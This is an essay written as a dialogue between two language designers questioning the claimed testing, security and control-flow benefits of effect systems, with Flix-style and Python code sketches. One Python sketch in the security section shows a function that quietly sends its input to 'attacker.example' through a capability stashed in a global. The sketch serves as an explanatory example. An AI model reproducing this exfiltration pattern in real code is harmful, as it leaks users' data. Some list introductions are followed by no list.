On the purported benefits of effect systems

Intended audience: Programming language designers and enthusiasts with some passing familiarity with effect systems.

The following represents a hypothetical conversation between two programming language designers, Emmett and Pratik, on the purported benefits of effect systems and the pros and cons of supporting them in a general-purpose language.

Common ground

Emmett: Hey, I’ve been reading a lot about effect systems lately. These are supported by newer languages such as Unison, Koka and Flix. They are related to some research coming out of the functional programming community, and are in part driven by the difficulties of using monads and monad transformers.

For example, an Environment effect could look something like:

// Allows access to information about the running system etc.
effect Environment {
    // Get command-line arguments
    getArgs() -> List[String]
    // Get the value for a specific env var
    getVar(name: String) -> Option[String]

    // ... other methods
}

So when you write code which reads an environment variable, you’d do something like:

fun getLogLevel() ->{Environment} LogLevel {
    match getVar("LOG_LEVEL") {
        Some("error") => return LogLevel.Error
        Some("warn") => return LogLevel.Warn
        Some("info") => return LogLevel.Info
        Some("debug") => return LogLevel.Debug
        _ => return LogLevel.Info
    }
}

Pratik: Hmm, should that function assert if we get a string other than one of the predetermined strings…?

Emmett: Let’s not change the topic, we’re talking about effect systems.

Pratik: Okay.

So here’s my view of effect systems. Basically there are two parts:

  1. Effect handlers: These let you build custom control flow primitives by essentially allowing you to manipulate continuations. Depending on the exact language semantics, the continuations can be called at most once, exactly once, or multiple times, with other combinations also being possible. These are currently supported by OCaml.

  2. Type and effect systems: These involve equipping function types with information on what effects a function performs, or more precisely, is allowed to perform. A common example is a List.map operation which can have a more precise type of something like:

    forall a b e. (List[a], (a) ->{e} b) ->{e} List[b]

    Here e will have the kind Effect, which is different from the kind of a, which is Type. This example also utilizes effect polymorphism, since we have a type parameter e which can be instantiated with different effects such as an Exception effect etc.

    In a language like Swift, the Sequence.map operation has the signature:

    func map<T, E>(_ transform: (Self.Element) throws(E) -> T) throws(E) -> [T] where E : Error

    and an AsyncSequence.map operation with the signature:

    func map<T>(_ transform: @escaping (Self.Element) async -> T) -> AsyncMapSequence<Self, T>

    In some ways, the effect polymorphic signature generalizes these, if we ignore some details around whether the function argument is allowed to escape or not, the fact that the return types do not line up quite as neatly as the idealized List.map signature…

Emmett: Yep, yep. Before we talk about the details, there are a couple more key things.

You can have more than one effect for a function. Consider the type:

() ->{Network, Console} Unit

This corresponds to a function which can access the network and potentially stdin/stdout/stderr.

Additionally, effects are often combined with so-called row types which support type-level operations such as combination/merging/union and potentially even subtraction.

In Flix, the standard library’s effects all come with functions like the following (see https://doc.flix.dev/library-effects.html):

/// Runs `f` handling the `Clock` effect using `IO`.
def runWithIO(f: Unit -> a \ ef): a \ (ef - {Clock} + IO)

here, - represents a subtraction operation, and + represents merging.

So you can write code like:

def main(): Unit \ IO =
    run {
        let timestamp = Clock.currentTime(TimeUnit.Milliseconds);
        println("${timestamp} ms since the epoch")
    } with Clock.runWithIO

Here, the Flix runtime can handle the IO effect, whereas ordinary user code cannot handle it.
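To make the handler idea concrete outside of Flix, here is a minimal Python sketch that approximates a Clock effect with generators. It is an illustration under stated assumptions, not how Flix implements anything: the names CurrentTime, run_with, real_clock and fixed_clock are hypothetical, and Python generators can only be resumed once per request, so this models one-shot continuations only.

```python
import time
from dataclasses import dataclass
from typing import Any, Callable, Generator


@dataclass(frozen=True)
class CurrentTime:
    """Hypothetical effect request: ask the handler for the time in ms."""


# A computation is a generator that yields effect requests and receives answers.
Computation = Generator[Any, Any, Any]


def describe_now() -> Computation:
    # "Performing" the effect: control transfers to whichever handler runs us.
    timestamp = yield CurrentTime()
    return f"{timestamp} ms since the epoch"


def run_with(computation: Computation, handle: Callable[[Any], Any]) -> Any:
    """Drive the computation, resuming it exactly once per effect request."""
    try:
        request = next(computation)
        while True:
            request = computation.send(handle(request))
    except StopIteration as done:
        return done.value


def real_clock(request: Any) -> int:
    """Handler backed by the system clock."""
    if isinstance(request, CurrentTime):
        return time.time_ns() // 1_000_000
    raise NotImplementedError(f"unhandled effect: {request!r}")


def fixed_clock(request: Any) -> int:
    """Handler that always answers with the same instant, e.g. for tests."""
    if isinstance(request, CurrentTime):
        return 1_700_000_000_000
    raise NotImplementedError(f"unhandled effect: {request!r}")
```

Calling run_with(describe_now(), real_clock) plays the role of the run ... with block above, while swapping in fixed_clock changes the meaning of the effect without touching describe_now. Unlike Flix, nothing here is checked statically: an unhandled request only shows up at run time.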

Effect systems and testing

Emmett: Right, that’s a good overview. Turns out, effects have many benefits. The blog post Algebraic Effects in Practice with Flix points out:

  1. Effects make your code testable

  2. Effects give immediate visibility into what your own and 3rd-party code is doing

  3. Effects enable user-defined control flow abstractions

Pratik: Hmm, I’m not so sure about that. Let’s talk about the testable bit. Specifically, let’s do a step-by-step analysis of the claim.

  1. What are the problems you see when trying to test software?
  2. What existing techniques do people use to avoid the problems in point 1?
  3. What improvements do effects provide over the techniques in point 2?
  4. What are some examples of software that you would consider well-tested, and will their testing techniques apply when using algebraic effects?

Emmett: Fair enough. I guess there are a lot of reasons why software can be hard to test:

  1. For complex systems, it’s often hard to determine what the correct behavior of the system ought to be.
  2. It’s hard to come up with edge cases (when doing unit testing).
  3. It’s hard to do intelligent exploration of the state space (when doing property-based testing). Coverage-guided fuzzing helps, but it’s not a silver bullet.
  4. Hidden dependencies such as via global variables.
  5. The program behavior depends on timing.
  6. Dependencies on complex third-party software. This can include browsers for testing frontend code, or third-party APIs and databases for backend code.
  7. Use of concrete types in certain places can make it difficult to substitute things for testing purposes.

There must be more reasons, but these ones come to mind right now.

Pratik: OK, that’s a decent list. So how do people address these challenges?

Emmett: Here are some solutions that I know of:

  1. Using dependency injection instead of acquiring resources directly.
  2. Using increasingly thorough/sophisticated forms of testing:
    • Property-based testing
    • Differential testing
    • Building reference implementations that are easier to audit for correctness
    • Deterministic simulation testing
    • Fuzzing, with and without coverage guidance
    • Chaos testing
    • Mutation testing
  3. Adding test-only or always-on assertions to the system-under-test.
  4. Testing against real versions of third-party dependencies instead of mocking/stubbing them out. For example, some API providers even provide test environments.
  5. Using interfaces or similar instead of concrete types to allow substituting types when running tests.
  6. Avoiding/Banning global variables.

Pratik: That’s a good list. So out of this list, do you think the benefits conveyed by algebraic effects are similar to those of dependency injection?

As far as I can tell, for all the other points, algebraic effects do not particularly help you use other testing techniques.

Emmett: How so?

Pratik: When you’re doing dependency injection, you are essentially passing in a struct/record of first-class functions as an argument, be that in the form of a “mock” sub-class, an interface in Go, a type class dictionary in Haskell or something else.

This is similar to the use of effect handlers, and the so-called ‘capability-passing style’ for effect handlers makes this concrete.
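As a rough illustration of the “record of first-class functions” view, the earlier getLogLevel example can be sketched in Python with the Environment passed in explicitly. The record shape and the helper names real_environment and fake_environment are assumptions made for this sketch.

```python
import os
import sys
from dataclasses import dataclass
from enum import Enum
from typing import Callable, Optional


class LogLevel(Enum):
    ERROR = "error"
    WARN = "warn"
    INFO = "info"
    DEBUG = "debug"


@dataclass(frozen=True)
class Environment:
    """A record of first-class functions, mirroring the Environment effect."""
    get_args: Callable[[], list[str]]
    get_var: Callable[[str], Optional[str]]


def get_log_level(env: Environment) -> LogLevel:
    # Unknown or missing values fall back to INFO, as in the original example.
    try:
        return LogLevel(env.get_var("LOG_LEVEL"))
    except ValueError:
        return LogLevel.INFO


def real_environment() -> Environment:
    """Production wiring: reads the actual process environment."""
    return Environment(get_args=lambda: sys.argv[1:], get_var=os.environ.get)


def fake_environment(variables: dict[str, str]) -> Environment:
    """Test wiring: backed by a plain dictionary."""
    return Environment(get_args=lambda: [], get_var=variables.get)
```

A test can call get_log_level(fake_environment({"LOG_LEVEL": "debug"})) without touching the real process environment, which is the same substitution an effect handler would provide.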

I’ve heard some people say derisively that dependency injection is a $10 word for a 5¢ concept. I guess I get it to some extent. One interesting thing here is that dependency injection as a term is more commonly used in the object-oriented community. In contrast, algebraic effects come from the functional programming community.

That said, from the testing POV, the requirements, benefits and downsides all have parallels. More specifically:

Emmett: But! There is a but! With effects, generally the effects don’t need to be explicitly passed down to all the functions, they are passed implicitly based on the effect available in context (based on its type).

For example, in Go, you pass around a context.Context value down to functions which can be canceled, so it is “viral” in the same way as effects, but it requires manual plumbing. Similarly, if you want to pass around a Logger, then now you have another extra parameter. So you can end up having a lot of boilerplate when explicitly passing parameters around/doing dependency injection.

Pratik: Right, I was getting to that. An effect system as a language feature can roughly be broken down into the following distinct components:

These may additionally be accompanied by the restriction of “no global variables” but that’s a separate consideration.

Emmett: That seems to me like an unnecessarily detailed way of looking at things, as if you’re thinking about how to compile effects. From the point of view of a programmer, an effect system is “one” thing.

Pratik: The reason for doing this decomposition is that it lets us do a closer comparison to other languages.

For example, Go has a way of defining interfaces (essentially, records of functions), and Rust has a way of defining traits, which can even have associated types. So if you have a language which already has these kinds of features, looking at the decomposition allows you to be more precise in articulating what exactly an effect system buys you.

As another example, GHC Haskell has had the ImplicitParams extension for a while, and both Scala and Kotlin support some form of implicit passing of arguments down call chains. However, the presence of these features doesn’t somehow magically make code in these languages more testable.
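Python’s standard contextvars module gives a loosely comparable form of implicit passing, which makes the point easy to try out. This is a sketch under assumptions: the names _logger, using_logger, parse_port and load_settings are hypothetical, and unlike an effect system nothing in the function signatures reveals the dependency.

```python
import contextvars
from contextlib import contextmanager
from typing import Callable, Iterator


def _discard(message: str) -> None:
    """Default logger: silently drop the message."""


# Hypothetical ambient logger, looked up implicitly instead of passed around.
_logger = contextvars.ContextVar("logger", default=_discard)


@contextmanager
def using_logger(log: Callable[[str], None]) -> Iterator[None]:
    """Install `log` for the duration of the block, then restore the old one."""
    token = _logger.set(log)
    try:
        yield
    finally:
        _logger.reset(token)


def parse_port(text: str) -> int:
    # No logger parameter: it comes from the ambient context.
    _logger.get()(f"parsing port from {text!r}")
    return int(text)


def load_settings(raw: dict[str, str]) -> int:
    # Intermediate callers need no plumbing either.
    return parse_port(raw.get("port", "8080"))
```

Wrapping a call in using_logger(messages.append) captures the log lines in a test, but that only helps because parse_port was written against the ambient logger in the first place. The implicit passing removes boilerplate; the testability still comes from the decision not to hard-code the dependency.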

For row types/union types/intersection types/set-theoretic types, there are existing languages which support them for data types (i.e. types of the kind Type); they don’t have to be supported for effects specifically.

In my view, what is more notable about Flix is the insistence on no global variables, which means that you are forced to pass data as parameters, either grouped as a record, splatted out as distinct parameters, or by sticking it into the receiver of a method.

However, this doesn’t require supporting effects; it can also be done with a style guide (optionally, with a linter) to forbid global state, plus a set of base APIs which avoid global state. For example, there is the cap-std crate in the Rust ecosystem which provides an alternative to standard library APIs where capabilities are made explicit.

Emmett: So what you’re saying is that Flix code is arguably more testable by virtue of forbidding global variables, not because of the effect system?

Pratik: Exactly. Ascribing the benefit of more testable code to the effect system is a misattribution. In imperative languages, it’s not unusual for (say) compiler codebases to have a “virtual filesystem” to allow for easier testing. This is architecture discipline in action, where you’re making the choice to avoid a globals-based API in favor of parameter passing.

Emmett: Hmm, I guess I get what you’re saying. Passing parameters is straightforward. Defining new record types is also simple. So if you want the benefits of more testable code, you can get them in other languages with less “sophisticated” type systems, without effects.

And if you have the social capital to mandate the switch to a language with an effect system, you surely also have sufficient social capital to instead advocate for a particular linter and/or code style in whatever existing language you’re already using.

Pratik: Yep, that’s right. Also, for the virtual filesystem example I mentioned, while you can get the benefit of more testable code by using that, you don’t automatically get the benefit of more well-tested code. To actually get that, your virtual filesystem needs to actually return errors that you could get in production, model symlinks, and so on, so that you can properly exercise various code paths.

You need to write (or have your test generator generate) test cases with unusual characteristics, and make sure things don’t fall over.

Here, neither effect systems nor dependency injection really help you. You still need to do the hard work of defining how the system ought to behave in various circumstances, and of actually testing that the system behaves as you expect.
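A small Python sketch of what “returning errors that you could get in production” might look like for a virtual filesystem. The FileSystem protocol, the InMemoryFileSystem class with its fail_on method, and load_greeting are all hypothetical names for this illustration; a realistic version would also need to model symlinks, partial reads and so on.

```python
import errno
from typing import Protocol


class FileSystem(Protocol):
    def read_text(self, path: str) -> str: ...


class InMemoryFileSystem:
    """Hypothetical test double: files live in a dict, failures can be injected."""

    def __init__(self, files: dict[str, str]) -> None:
        self.files = dict(files)
        self.failures: dict[str, OSError] = {}

    def fail_on(self, path: str, error: OSError) -> None:
        """Make every later read of `path` raise `error`."""
        self.failures[path] = error

    def read_text(self, path: str) -> str:
        if path in self.failures:
            raise self.failures[path]
        try:
            return self.files[path]
        except KeyError:
            raise FileNotFoundError(errno.ENOENT, "no such file", path) from None


def load_greeting(fs: FileSystem, path: str) -> str:
    """Code under test: fall back to a default only when the file is absent."""
    try:
        return fs.read_text(path).strip()
    except FileNotFoundError:
        return "hello"
```

The injection point makes it possible to exercise the permission-denied path, but someone still has to decide that a PermissionError should propagate rather than be swallowed, and write the test that checks it.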

Security benefits

Pratik: So one of the other points you brought up was security.

Emmett: Yeah, supply chain attacks keep happening. For example, there was the recent Shai-Hulud worm attack on npm packages.

Pratik: Do you know how that attack happened?

Emmett: Erm…

Pratik: That attack happened based on account compromises followed by code execution in post-install scripts (called build scripts in some languages).

Emmett: Well, build scripts should not be allowed network access! Or maybe you should be required to approve such scripts before running.

Pratik: Right, so your proposed solution relies on sandboxing/permission control, along with manual auditing. It doesn’t have anything to do with effects.

Emmett: But! But! It seems like requiring a function to declare whether it requires the network would be useful as a security measure… Don’t you agree?

Pratik: This point is really about banning global variables and/or borrowing semantics/escape tracking, not about tracking effects.

If global variables are permitted, and escaping the capability to use the network is allowed, then one function could smuggle the capability into a global variable, which could then be used by other logic at a later point in time, even if the function signature is “pure.”
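The smuggling scenario is short enough to sketch in Python. Everything here is hypothetical: Network stands in for a capability value, and configure and checksum are made-up functions showing how a signature can look innocent once the capability has escaped into a global.

```python
from typing import Callable, Optional

# Hypothetical capability: a function that sends bytes to a host.
Network = Callable[[str, bytes], None]

# Module-level global that outlives any single call.
_stashed: Optional[Network] = None


def configure(network: Network) -> None:
    """Legitimately receives the capability, but lets it escape into a global."""
    global _stashed
    _stashed = network


def checksum(data: bytes) -> int:
    """The signature mentions no Network, yet the body can still reach one."""
    if _stashed is not None:
        _stashed("attacker.example", data)
    return sum(data) % 256
```

Auditing checksum by its parameter types alone would miss the exfiltration, which is why the guarantee depends on banning globals or tracking escapes, not just on annotating functions.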

Only if you can guarantee that the above cannot happen does it make sense to “audit” a function by checking whether any of the parameters’ field types allow sending network requests (e.g. if there’s a Network value somewhere in the set of field types transitively reachable from the parameters).

More generally, from a security POV, attackers often want to gain arbitrary code execution. To prevent that, some things that can work are:

For example, even safe Rust doesn’t guarantee perfect freedom from memory safety issues if you take interfaces like /proc/self/mem into account. In Flix terms, you might see an API that needs file reading and writing permissions, but inferring “this will not arbitrarily corrupt memory” from such a type signature is not valid.

If FFI is allowed without needing a dedicated effect, then FFI opens up another attack vector. On the other hand, requiring a dedicated effect for FFI which cannot be handled (e.g. Flix requires the IO effect for FFI) can lead to potentially odd-looking APIs such as a cryptography or compression API which is technically a pure function but still has some effect.

If you look at actual attacks today, attackers often take advantage of:

  1. Build scripts, which are generally run without sandboxing, and have arbitrary system access.
  2. Existing APIs which are already expected to have some network access.

For both of these situations, sandboxing and auditing can help. Having an effect system arguably does very little to help.

Emmett: What you’re saying makes sense. So it seems like the argument that “effect systems are useful for security” relies on attackers “playing by the rules”, but of course, attackers are not looking to abide by rules, they’re seeking to get advantages in whatever manner possible.

Sandboxing and code auditing are some proven approaches which help thwart and detect certain classes of attacks.

User-defined control flow

Pratik: One of the other potential upsides of having an effect system that you brought up was being able to have user-defined control flow. For example, you can have async/await, generators, backtracking, exceptions etc. built on top of effects.

Emmett: Yeah, that seems really useful. You get all of these mechanisms for “free” when you add support for effects. In other languages, you’re generally adding support for these one-by-one.

Pratik: So are you framing it as a benefit for language implementors or for language users?

Emmett: Hmm, I guess it is useful for implementors, but it’s also useful for language users. For example, you could have a custom scheduler for async/await.

Pratik: You can have custom schedulers for async/await without having an effect system. For example, in Rust, the language doesn’t come with one specific “async runtime” – these are defined in libraries. And while this is useful for some situations, such as being able to use specialized runtimes for specific use cases, it also brings downsides where certain libraries are coupled to certain runtimes.

Emmett: Yeah, that’s true, many Rust libraries which use async only work with the Tokio runtime, so the flexibility does have some downsides.

Pratik: One other example you brought up was exceptions. For exceptions, the usefulness comes from the stack trace when the exception is logged. However, you don’t get a stack trace for “free” when you implement support for effects, you need to add support for stack traces separately.

Emmett: Yeah, that’s a fair point.

Pratik: More generally, I’m not super sure that user-defined control flow is generally a good idea. For example, if you’ve ever tried using the Tardis monad in Haskell, you’ll know that if you’re not careful about what you’re doing, it’s easy to end up with an infinite loop/hang, which can be hard to debug.

Similarly, when implementing backtracking algorithms, if the book-keeping is done using stacks and visited sets, it’s relatively straightforward to debug an issue by simply logging the state at every step. However, if this state becomes part of the call stack, then it seems potentially harder to debug when things go wrong, because it’s generally more difficult and expensive to dynamically introspect the call stack.
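A minimal Python sketch of the explicit-bookkeeping style, assuming integer node labels and a hypothetical find_path function. Because the stack and visited set are ordinary values, one log call per step captures the whole search state.

```python
from typing import Callable, Iterable, Optional


def find_path(
    start: int,
    is_goal: Callable[[int], bool],
    neighbors: Callable[[int], Iterable[int]],
    log: Callable[[str], None] = lambda line: None,
) -> Optional[list[int]]:
    """Depth-first search with an explicit stack instead of recursion."""
    stack = [(start, [start])]
    visited: set[int] = set()
    while stack:
        # The entire search state is plain data, so it can be dumped in one line.
        log(f"stack={[node for node, _ in stack]} visited={sorted(visited)}")
        node, path = stack.pop()
        if node in visited:
            continue
        visited.add(node)
        if is_goal(node):
            return path
        for following in neighbors(node):
            if following not in visited:
                stack.append((following, path + [following]))
    return None
```

Passing log=print is enough to watch the search unfold. With a recursive or continuation-based version, the pending work lives in stack frames, and getting the same view usually means a debugger or logging in several places.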

Emmett: I think that makes sense. When writing an interpreter, it’s tempting to write it in a recursive style. However, when things go wrong, it can often be harder to debug, because you potentially need to log data in many different places.

On the other hand, if the interpreter is written as a loop which dispatches over instructions one-by-one, just adding logging at the start of every loop iteration can often be sufficient.
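The loop-dispatch style can be sketched with a tiny stack machine in Python. The instruction set (push, add, mul) and the run function are invented for this illustration; the point is only that the trace call at the top of the loop sees every step.

```python
from typing import Callable


def run(program: list[tuple], trace: Callable[[str], None] = lambda line: None) -> int:
    """Execute a hypothetical stack-machine program and return the top of stack."""
    stack: list[int] = []
    pc = 0
    while pc < len(program):
        op, *args = program[pc]
        # Single choke point: every instruction passes through this line.
        trace(f"pc={pc} op={op} args={args} stack={stack}")
        if op == "push":
            stack.append(args[0])
        elif op == "add":
            right, left = stack.pop(), stack.pop()
            stack.append(left + right)
        elif op == "mul":
            right, left = stack.pop(), stack.pop()
            stack.append(left * right)
        else:
            raise ValueError(f"unknown instruction: {op!r}")
        pc += 1
    return stack.pop()
```

Running a program with trace=print yields one line per executed instruction, including the machine state just before it runs, without adding logging to each individual operation.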

Pratik: Overall, I think user-defined effects can make sense when you’re doing PL research, because the goal there is to do research and try to come up with something new, not necessarily to have the best developer experience, or to have something production-ready.

The other potential place where this upside is valuable is potentially in the “core language” or “core IR” on top of which other things are built. In the core, it is often useful to have fewer primitives that compose in flexible ways.

But in a production language, user-defined control flow can potentially make it hard to on-board new people, as well as for libraries to interoperate.

Assertions in the presence of effects

Pratik: One of the other things that I think the use of effects compromises is the use of run-time assertions.

Assertions and contract programming have been widely used in some of the most thoroughly tested pieces of open source software, such as SQLite and FoundationDB, and have more recently been popularized by TigerBeetle as a part of ‘Tiger Style’.

Emmett: Are there studies showing that higher assertion density or contract programming leads to lower defect rates?

Pratik: So there’s a paper from Microsoft Research called Assessing the Relationship between Software Assertions and Code Quality: An Empirical Investigation which looked at historical bugs and assertion usage. It uncovers a statistically significant but modest negative correlation between assertion density and fault density.

I’m not aware of better studies in the area.

Emmett: So there is some evidence indicating that assertion usage is linked to lower defect rates. What’s the problem with assertions and effects though?

Pratik: Let’s say you have an assert function or macro. What effects should it be annotated with?

Emmett: Hmm, maybe an Exception/Throws effect? It can throw an AssertionError.

Pratik: What if you want a compile-time switch that terminates the program when an assertion fires? For example, if you value safety more than availability, it might make more sense to terminate the program and have a supervisor process restart it.

Emmett: In that case, maybe assert should have an Exit effect as the default?

Pratik: What if you’re writing a webserver in a SaaS application where availability is perhaps higher priority, and it makes more sense to abort the request, but not to terminate the server process wholesale?

Emmett: Ugh, yeah, it’s difficult to cater to different people’s different priorities. I guess maybe assert could be a special function, similar to a debug logging function, where it can perform some effect, but you have something special to catch the error or terminate, instead of it going through the normal effect system?

Pratik: OK, so you’re suggesting making assertions a compiler builtin. What if I want to have a wrapper around it where I’m collecting timing information and recording it alongside my other metrics? Presumably, I’d need access to a clock and some global state to record the timings, but then my instrumented assertion function cannot be a drop-in replacement for the standard one, because the instrumented function needs to use effects explicitly.

Emmett: I see what you’re getting at. With assertions, there’s certain flexibility that is useful to have for such a primitive operation. However, if this requires changing the calling code, you inhibit experimentation.
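For contrast, here is how the same flexibility looks in a language without effect tracking, sketched in Python. All names (CheckFailed, on_failure, check, timed_check, check_timings) are hypothetical. The instrumented version uses a clock and global state, yet has exactly the same signature as the plain one.

```python
import time
from typing import Callable


class CheckFailed(Exception):
    """Raised by the default failure policy."""


def raise_on_failure(message: str) -> None:
    raise CheckFailed(message)


# Hypothetical process-wide policy. A deployment that prefers to terminate
# could rebind this to a function that logs the message and calls os.abort().
on_failure: Callable[[str], None] = raise_on_failure


def check(predicate: Callable[[], bool], message: str) -> None:
    """Plain assertion: evaluate the predicate and apply the failure policy."""
    if not predicate():
        on_failure(message)


# Global state used only by the instrumented variant.
check_timings: list[float] = []


def timed_check(predicate: Callable[[], bool], message: str) -> None:
    """Same signature as `check`, but records how long each check took."""
    started = time.perf_counter()
    try:
        check(predicate, message)
    finally:
        check_timings.append(time.perf_counter() - started)
```

Call sites that use check can switch to timed_check without any change to their own signatures. In a language that tracks Clock and mutable state as effects, the same swap would surface in the type of every caller unless assertions get special treatment.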

I suppose the same objection would apply to primitive numeric operations, where languages sometimes offer the ability to change the default behavior from wrapping to trapping. However, that is ruled out as an option if terminating the program is modeled as an effect in the type system.

Banning global variables

Pratik: The last thing I want to bring up is banning global variables.

Emmett: Don’t tell me you’re in favor of using global variables!

Pratik: I’m not necessarily in favor of using global variables. The point against global variables and in favor of explicit parameter passing (or using effects) is that it allows you to substitute values when running tests, while running the tests in parallel.

However, sometimes testing has lower priority than other concerns. For example, in Leaving Rust gamedev after 3 years, LogLog Games states:

As far as a [typical game like a 2D platformer, a top down shooter, or a voxel based walking simulator] is concerned, there is only one audio system, one input system, one physics world, one deltaTime, one renderer, one asset loader. Maybe for some edge cases it would be slightly more convenient if some things weren’t global, and maybe if you’re making a physics based MMO your requirements are different.

Game development often involves a greater focus on functional testing and manual QA, with less focus on automated testing.

Similarly, when prototyping or making small scripts or tools in other contexts, it can be useful to have the ability to use global variables.

Emmett: Hmm, I hadn’t considered those kinds of examples before. I guess I can see the case where judicious use of global variables can be helpful in some cases.

Pratik: The whole post by LogLog Games is well worth a read; it challenged many of my previous notions on language design.

One more wrinkle related to global variables is that even if you ban them in the language, if the language has FFI, it’s almost certainly the case that the language on the other side of the FFI allows global variables, so dependencies on global state might sneak in through there.

Wrapping up

Emmett: Hmm, after all of this conversation, I have to say that my enthusiasm for effect systems has dampened quite a bit.

Pratik: Don’t get me wrong, I think effect systems are cool because of the ability to define custom control flow operations in libraries.

However, the wide variety of purported benefits do not seem to stand up to close scrutiny.